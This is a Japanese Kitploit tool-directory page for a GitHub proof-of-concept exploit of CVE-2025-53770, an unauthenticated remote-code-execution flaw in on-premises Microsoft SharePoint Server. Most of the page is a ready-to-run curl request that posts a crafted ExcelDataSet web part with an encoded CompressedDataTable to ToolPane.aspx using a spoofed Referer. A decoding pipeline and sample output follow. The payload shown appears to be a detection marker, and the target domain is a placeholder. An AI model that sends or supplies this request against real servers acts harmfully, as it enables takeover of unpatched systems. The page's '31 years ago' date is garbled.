Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-53770 — Microsoft SharePoint Server (CVE-2025-53770) における安全でない逆シリアル化を介した未認証のリモートコード実行の概念実証エクスプロイト、ペイロード抽出およびデコードコマンド付き。 | Kitploit
ツール/GitHubGitHub/0xray5c68616e37/cve-2025-53770
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHub0xray5c68616e37/cve-2025-53770

cve-2025-53770

Microsoft SharePoint Server (CVE-2025-53770) における安全でない逆シリアル化を介した未認証のリモートコード実行の概念実証エクスプロイト、ペイロード抽出およびデコードコマンド付き。

リポジトリを見る
31年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2025-53770 SharePoint デシリアライゼーション RCE PoC

Critical — 認証されていないユーザーが Microsoft SharePoint Server の安全でないデシリアライゼーションを介してリモートコード実行を行い、システムを危険にさらす可能性があります。(CVE-2025-53770)

説明

オンプレミスのMicrosoft SharePoint Serverにおける信頼されていないデータのデシリアライゼーションにより、攻撃者はリモートでコードを実行し、システムを侵害する可能性があります。マイクロソフトは現在も継続的な悪用を認識しており、包括的な更新プログラムを準備しています。CVEドキュメントに記載されている緩和策が適用されていることを確認してください。

  • 影響: 認証されていない攻撃者がリモートコード実行を達成し、システム全体の侵害につながる可能性があります。
  • 深刻度: Critical

概念実証 (PoC)

次のPoCは、攻撃者が脆弱性を悪用して、脆弱なエンドポイントを介して悪意のあるペイロードを抽出およびデコードする方法を示しています。

ターゲットドメインは意図的に reeaccated.com に置き換えられています。

コマンド

root@kitploit:~
curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

出力

root@kitploit:~
<Info>IntruderScannerDetectionPayload</Info>
画像

参考文献

  • テストペイロードの実装
  • Code White セキュリティ分析
  • Microsoft ガイダンス
  • NVD エントリ

影響:
認証されていない攻撃者は、安全でないデシリアライゼーションを悪用して SharePoint Server 上でリモートコード実行を達成し、システム全体の侵害につながる可能性があります。

ツールをダウンロード